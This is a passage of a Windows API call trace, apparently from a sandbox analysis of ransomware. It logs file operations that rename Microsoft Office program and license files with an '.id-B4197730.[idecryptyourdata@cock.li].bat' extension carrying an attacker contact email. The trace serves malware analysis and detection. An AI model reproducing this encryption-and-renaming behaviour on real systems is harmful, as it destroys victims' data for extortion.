Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\htech_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.359] CloseHandle (hObject=0x438) returned 1 [0160.361] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.361] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\indst_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.361] CloseHandle (hObject=0x438) returned 1 [0160.818] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.818] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\java_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.819] CloseHandle (hObject=0x42c) returned 1 [0161.060] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\AppVOpcServices.dll" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\appvopcservices.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\AppVOpcServices.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\appvopcservices.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0161.061] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0161.061] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0161.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\AppVOpcServices.dll.manifest.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\appvopcservices.dll.manifest.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0161.062] CloseHandle (hObject=0x438) returned 1 [0161.858] SetFilePointerEx (in: hFile=0x518, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0161.858] SetFilePointerEx (in: hFile=0x518, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0161.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\AppVPackaging.dll.manifest.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\appvpackaging.dll.manifest.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.011] CloseHandle (hObject=0x518) returned 1 [0162.218] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.218] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.218] CloseHandle (hObject=0x51c) returned 1 [0162.219] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.219] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.220] CloseHandle (hObject=0x51c) returned 1 [0162.221] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.221] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_KMS_Client-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_kms_client-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.221] CloseHandle (hObject=0x51c) returned 1 [0162.222] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.222] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_KMS_Client-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_kms_client-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.222] CloseHandle (hObject=0x51c) returned 1 [0162.223] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.223] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_KMS_Client-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_kms_client-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.224] CloseHandle (hObject=0x51c) returned 1 [0162.224] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.225] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.225] CloseHandle (hObject=0x51c) returned 1 [0162.226] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.226] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.226] CloseHandle (hObject=0x51c) returned 1 [0162.227] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.227] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.227] CloseHandle (hObject=0x51c) returned 1 [0162.229] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.229] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.229] CloseHandle (hObject=0x51c) returned 1 [0162.230] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.230] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-bridge-office.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-bridge-office.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.230] CloseHandle (hObject=0x51c) returned 1 [0162.232] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.232] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-root-bridge-test.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-root-bridge-test.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.236] CloseHandle (hObject=0x51c) returned 1 [0162.237] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.237] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-root.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-root.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.238] CloseHandle (hObject=0x51c) returned 1 [0162.239] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.239] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-stil.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-stil.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.239] CloseHandle (hObject=0x51c) returned 1 [0162.240] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.240] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.241] CloseHandle (hObject=0x51c) returned 1 [0162.242] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.243] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.243] CloseHandle (hObject=0x51c) returned 1 [0162.246] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.246] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.246] CloseHandle (hObject=0x51c) returned 1 [0162.247] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.247] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.248] CloseHandle (hObject=0x51c) returned 1 [0162.249] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.249] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.249] CloseHandle (hObject=0x51c) returned 1 [0162.250] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.250] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.250] CloseHandle (hObject=0x51c) returned 1 [0162.251] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.251] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.251] CloseHandle (hObject=0x51c) returned 1 [0162.252] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.252] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.252] CloseHandle (hObject=0x51c) returned 1 [0162.253] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.253] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.253] CloseHandle (hObject=0x51c) returned 1 [0162.254] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.254] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.254] CloseHandle (hObject=0x51c) returned 1 [0162.255] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.255] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.460] CloseHandle (hObject=0x51c) returned 1 [0163.412] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.412] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.617] CloseHandle (hObject=0x514) returned 1 [0163.617] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.617] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.617] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_mak-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.618] CloseHandle (hObject=0x514) returned 1 [0163.618] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.619] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft 